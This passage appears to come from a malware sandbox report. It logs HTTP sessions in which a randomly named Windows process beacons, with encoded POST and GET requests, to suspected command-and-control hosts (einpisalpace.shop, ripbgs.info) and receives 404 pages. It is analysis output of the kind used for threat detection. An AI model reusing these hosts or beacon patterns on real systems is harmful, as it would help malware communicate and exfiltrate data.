                                                                    Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                                    Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                                                                    Jan 10, 2025 09:11:26.645797968 CET384INData Raw: d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75
                                                                    Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<P


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.649989188.114.96.3806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:28.078591108 CET814OUTPOST /pgw3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.einpisalpace.shop
                                                                    Origin: http://www.einpisalpace.shop
                                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 74 67 39 44 36 52 52 68 71 39 4d 54 79 6c 73 6b 79 4d 59 44 72 64 47 63 79 4d 50 72 6e 4d 44 50 51 41 48 6d 2f 70 77 68 49 32 44 58 54 53 5a 4e 39 46 50 72 6c 2b 76 54 7a 70 4f 76 4a 51 66 49 63 49 72 52 38 6c 47 44 45 37 55 67 6a 53 58 4d 34 30 75 32 69 31 43 41 65 66 6d 79 38 73 2f 70 4b 4c 53 48 6e 42 4d 34 51 44 59 57 73 4e 49 75 4d 73 75 6f 6a 66 2b 4c 6d 4b 49 74 2f 62 74 30 44 5a 6f 66 74 6c 76 4b 63 52 69 66 6f 63 68 7a 30 6f 32 35 55 47 53 52 6f 6a 2f 51 6e 6f 61 49 6d 69 7a 33 52 6b 6e 54 4c 49 72 2f 37 30 48 7a 75 6b 36 62 57 53 47 61 44 6f 43 35 6a 43 50 42 6b 41 4f 6e 4a 51 69 36 7a 50 55 5a 33 65 4f 56 6c 50 5a 53 47 42 42 38 4e 72 50 6c 6b 59 73 51 58 51 3d 3d
                                                                    Data Ascii: -0-L9xY=tg9D6RRhq9MTylskyMYDrdGcyMPrnMDPQAHm/pwhI2DXTSZN9FPrl+vTzpOvJQfIcIrR8lGDE7UgjSXM40u2i1CAefmy8s/pKLSHnBM4QDYWsNIuMsuojf+LmKIt/bt0DZoftlvKcRifochz0o25UGSRoj/QnoaImiz3RknTLIr/70Hzuk6bWSGaDoC5jCPBkAOnJQi6zPUZ3eOVlPZSGBB8NrPlkYsQXQ==
                                                                    Jan 10, 2025 09:11:29.180578947 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:11:29 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJ7hrss%2Byexp%2F9EiCU0U0gYQ9GK24OY0%2BT12nZrkiH3Pi8ciGA%2BBYiE7t0lucV1JPKFAwL8qjyTAnDs37DA1TsvfDhcuZ%2ByWTFyKuo7cK7c65OMGzgW7dVz%2BF%2FXk9pwbACWHZzX5w8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb324eeb0242c9-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=814&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                                    Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQ
                                                                    Jan 10, 2025 09:11:29.180603981 CET383INData Raw: 66 97 e7 97 d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2
                                                                    Data Ascii: fRp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.649990188.114.96.3806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:30.627504110 CET1827OUTPOST /pgw3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.einpisalpace.shop
                                                                    Origin: http://www.einpisalpace.shop
                                                                    Referer: http://www.einpisalpace.shop/pgw3/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 74 67 39 44 36 52 52 68 71 39 4d 54 79 6c 73 6b 79 4d 59 44 72 64 47 63 79 4d 50 72 6e 4d 44 50 51 41 48 6d 2f 70 77 68 49 32 4c 58 53 6b 4e 4e 38 6d 58 72 2f 2b 76 54 77 70 4f 69 4a 51 66 56 63 49 43 57 38 6c 4b 31 45 39 51 67 69 7a 33 4d 36 47 47 32 73 31 43 41 57 2f 6d 7a 68 63 2f 34 4b 4c 69 44 6e 42 63 34 51 44 59 57 73 4f 51 75 61 74 75 6f 6c 66 2b 4d 73 71 49 62 30 37 74 51 44 5a 77 50 74 6c 37 61 41 31 75 66 72 38 78 7a 35 2b 71 35 4a 57 53 54 72 6a 2f 32 6e 6f 57 54 6d 69 75 49 52 6b 36 62 4c 50 6a 2f 33 46 66 75 79 48 57 6a 4c 68 6d 6f 56 72 32 4c 74 44 76 6b 38 42 6d 4a 4d 79 6e 49 2b 38 63 47 35 34 6d 59 67 76 59 77 4d 33 31 58 49 4f 32 73 74 73 39 69 4c 53 53 4a 49 49 6e 50 6c 67 37 74 37 6a 4a 39 4b 61 68 70 48 51 62 69 6a 41 70 2f 67 73 6c 4f 50 53 62 6c 42 75 31 70 62 2b 30 42 6b 49 6d 79 30 4c 79 5a 55 39 44 41 49 53 36 77 50 64 70 34 53 68 30 79 63 61 4b 50 52 72 37 71 45 50 35 53 58 75 4c 39 68 47 51 38 55 7a 36 4b 44 31 42 74 4b 70 36 69 61 77 59 46 76 41 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=tg9D6RRhq9MTylskyMYDrdGcyMPrnMDPQAHm/pwhI2LXSkNN8mXr/+vTwpOiJQfVcICW8lK1E9Qgiz3M6GG2s1CAW/mzhc/4KLiDnBc4QDYWsOQuatuolf+MsqIb07tQDZwPtl7aA1ufr8xz5+q5JWSTrj/2noWTmiuIRk6bLPj/3FfuyHWjLhmoVr2LtDvk8BmJMynI+8cG54mYgvYwM31XIO2sts9iLSSJIInPlg7t7jJ9KahpHQbijAp/gslOPSblBu1pb+0BkImy0LyZU9DAIS6wPdp4Sh0ycaKPRr7qEP5SXuL9hGQ8Uz6KD1BtKp6iawYFvAu6sD1tar9LP1sm81BSRflIBS5+m4sHavV68zjimxI/tjuGkIsAB7Bfn4WeXPoy1OlqHp22sOeMzGhqhQwIiTgsZVxAXbloHSFr0QhVDrk0hfWe9QgvNxRT8I4uYb9ntaGV6Yp0T871PwIj2AyysyKwfu6gdyDU6mi0O0dW5wgemK5qa6AOkUyngXHWL+gVvnAE3VCDaS0aF+oTDmiXmjLKKegLS82pDQJE8w2M8FAzQDauGL4R4w4Y9ScI3smGG0aCsfJeE7/u3wRa/oshugZnlIAA7hrGnxBDAkqP54tMUsLacz92Bcykw7JEJsp1nIYnT70wUfNZcPPpVqxO2zp1bp0xwEHPeMg/7PnMhrQVSSLnuie4HR1Jk1ic+b8sMnlhM1Ci1pD2LD6ooYqnY7vltqn97lFIPDMBY7QoNGtKFwGW9fm4bOhdvhFfZ0PH2E2G+thcilmCxc8WZr6iIpdE6Ir81+G/rVyZ1waf9WIz56ZuSk5TuF1CBtRlpZhaF5w60S7MQyaZMFrJcKO5oOXaTSjOTbpafL0KSyKYaK3XIOX04fj/Jp3eu++9yyJ/WVfceLaGP6pVpMmqJZhn4KQSkR0b+EFdWnU+QwGxlM8+udAtvYCCzO/LD4voNuvfAajCl+lc2IGjBmMTHQJVuQmjChIdehIScFL4 [TRUNCATED]
                                                                    Jan 10, 2025 09:11:31.729211092 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:11:31 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65oyZ4DP%2BC0JwGm3OPngz5mLyZxKGMdEViDQA%2FFgTe2qEW7ZtlLBaYPqZct0PZYea3WmCjQxMf7UVgKPeqFhVGMcxcCUKdGZVRH1m9uazUNIqQoITAkKkfIkHX%2BVv5E%2BSE67eLwsj8E%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb325ecd3c8c30-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=1009&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                                    Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                                                                    Jan 10, 2025 09:11:31.729276896 CET384INData Raw: d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75
                                                                    Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<P


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.649991188.114.96.3806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:33.168490887 CET524OUTGET /pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.einpisalpace.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:11:34.316623926 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:11:34 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2dPqzR%2Fzpay%2BDAh0BItakTeQ8UGqi0Riu2ePbol0IB55lUBW%2FkdOdbgs%2FZDJS57O9%2FMlvINr%2FTv6P5sQjRwFBTuJAn33DBVS%2FljzLri96qesvFbh8tY7DP7ZM0cvj3YX%2FJgFH9MXV4%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb326ece0541cd-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=524&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                    Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type
                                                                    Jan 10, 2025 09:11:34.316644907 CET1057INData Raw: 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d
                                                                    Data Ascii: ="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bol


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.64999247.83.1.90806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:39.365300894 CET772OUTPOST /hf4a/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Origin: http://www.ripbgs.info
                                                                    Referer: http://www.ripbgs.info/hf4a/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4d 55 4b 36 6b 49 55 72 6e 72 44 74 31 72 49 67 46 58 67 54 6b 6d 42 76 68 54 50 33 57 6c 2f 34 59 4c 46 31 34 64 78 79 46 59 48 6e 78 48 44 47 70 57 41 74 44 61 44 74 36 45 4e 63 6a 47 4a 46 66 63 45 39 5a 45 46 75 70 5a 78 6c 55 6f 2f 41 36 38 6c 49 70 74 4d 53 34 6d 49 74 48 71 34 46 63 54 38 33 59 6e 72 78 71 67 4a 72 67 6c 64 49 48 31 79 59 70 35 4a 73 78 33 59 46 6d 56 33 7a 41 75 36 49 76 76 65 67 52 47 56 35 5a 4b 58 4c 74 66 61 57 78 46 64 41 47 72 78 2f 69 44 6f 6a 47 34 52 49 2f 6e 4b 75 31 49 51 4d 42 71 4e 37 4e 45 2b 6b 2b 59 31 31 4d 46 50 6e 6b 43 62 65
                                                                    Data Ascii: -0-L9xY=4zjSVCBXNBiBMUK6kIUrnrDt1rIgFXgTkmBvhTP3Wl/4YLF14dxyFYHnxHDGpWAtDaDt6ENcjGJFfcE9ZEFupZxlUo/A68lIptMS4mItHq4FcT83YnrxqgJrgldIH1yYp5Jsx3YFmV3zAu6IvvegRGV5ZKXLtfaWxFdAGrx/iDojG4RI/nKu1IQMBqN7NE+k+Y11MFPnkCbe


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.64999347.83.1.90806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:41.907010078 CET796OUTPOST /hf4a/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Origin: http://www.ripbgs.info
                                                                    Referer: http://www.ripbgs.info/hf4a/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4e 30 61 36 6d 72 38 72 68 4c 44 75 73 4c 49 67 4c 33 68 61 6b 6d 4e 76 68 58 33 42 56 58 62 34 59 71 31 31 35 63 78 79 45 59 48 6e 70 58 44 44 6e 32 41 69 44 62 2b 59 36 42 4e 63 6a 48 74 46 66 59 49 39 5a 33 74 76 6f 4a 78 6e 59 49 2f 43 6e 73 6c 49 70 74 4d 53 34 6d 63 44 48 71 51 46 63 6a 4d 33 58 6d 72 32 32 77 4a 30 68 6c 64 49 52 31 79 63 70 35 4a 61 78 7a 35 53 6d 58 50 7a 41 72 2b 49 75 39 6d 6a 62 47 56 2f 45 61 57 34 6c 50 62 54 2b 47 6f 73 5a 62 42 6f 7a 69 67 38 4b 75 4d 53 6a 55 4b 4e 6e 59 77 4f 42 6f 56 4a 4e 6b 2b 4f 38 59 4e 31 65 53 44 41 72 32 2b 39 58 70 36 72 71 46 6b 37 66 71 53 50 7a 4b 4d 45 38 48 4f 4f 53 41 3d 3d
                                                                    Data Ascii: -0-L9xY=4zjSVCBXNBiBN0a6mr8rhLDusLIgL3hakmNvhX3BVXb4Yq115cxyEYHnpXDDn2AiDb+Y6BNcjHtFfYI9Z3tvoJxnYI/CnslIptMS4mcDHqQFcjM3Xmr22wJ0hldIR1ycp5Jaxz5SmXPzAr+Iu9mjbGV/EaW4lPbT+GosZbBozig8KuMSjUKNnYwOBoVJNk+O8YN1eSDAr2+9Xp6rqFk7fqSPzKME8HOOSA==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.64999447.83.1.90806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:11:44.451373100 CET1809OUTPOST /hf4a/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Origin: http://www.ripbgs.info
                                                                    Referer: http://www.ripbgs.info/hf4a/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
